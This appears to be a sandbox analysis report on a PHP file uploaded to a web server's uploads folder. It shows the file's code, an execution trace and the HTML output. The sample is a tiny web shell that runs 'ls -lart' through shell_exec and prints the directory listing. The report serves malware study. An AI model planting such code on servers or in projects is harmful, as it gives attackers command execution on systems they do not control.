Screenshot
Attributes
Execution
shell_exec (Deobfuscated, Original)

Deobfuscated PHP code
<?php

$output = shell_exec('ls -lart');
echo "<pre>{$output}</pre>";
Execution traces
data/traces/c5111daca7d79b68b0764477925f78d7_trace-1676260161.5116.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:49:47.409451]
1	0	1	0.000133	393512
1	3	0	0.000181	393632	{main}	1		/var/www/html/uploads/0AB0.php	0	0
2	4	0	0.000198	393632	shell_exec	0		/var/www/html/uploads/0AB0.php	2	1	'ls -lart'
2	4	1	0.001733	394048
2	4	R			'total 24\ndrwxrwxrwx 3 root    root    4096 Feb 12 22:49 ..\n-rw-r--r-- 1 root    root      64 Feb 12 22:49 .htaccess\n-rwxr-xr-x 1 root    root      57 Feb 12 22:49 prepend.php\n-rw-rw-r-- 1 osboxes osboxes   72 Feb 12 22:49 0AB0.php\ndrwxrwxrwx 3 root    root    4096 Feb 12 22:49 .\ndrwxrwxrwx 2 root    root    4096 Feb 12 22:49 data\n'
1		A						/var/www/html/uploads/0AB0.php	2	$output = 'total 24\ndrwxrwxrwx 3 root    root    4096 Feb 12 22:49 ..\n-rw-r--r-- 1 root    root      64 Feb 12 22:49 .htaccess\n-rwxr-xr-x 1 root    root      57 Feb 12 22:49 prepend.php\n-rw-rw-r-- 1 osboxes osboxes   72 Feb 12 22:49 0AB0.php\ndrwxrwxrwx 3 root    root    4096 Feb 12 22:49 .\ndrwxrwxrwx 2 root    root    4096 Feb 12 22:49 data\n'
1	3	1	0.001793	394016
			0.001821	314640
TRACE END   [2023-02-13 01:49:47.411166]

Generated HTML code
<html><head></head><body><pre>total 12
drwxrwxrwx 3 root    root    4096 Feb 12 22:49 ..
-rw-r--r-- 1 root    root       0 Feb 12 22:49 beneri.se_malware_analysis
-rw-rw-r-- 1 osboxes osboxes   72 Feb 12 22:49 0AB0.php
drwxrwxrwx 2 root    root    4096 Feb 12 22:49 .
</pre></body></html>
Original PHP code
<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";
?>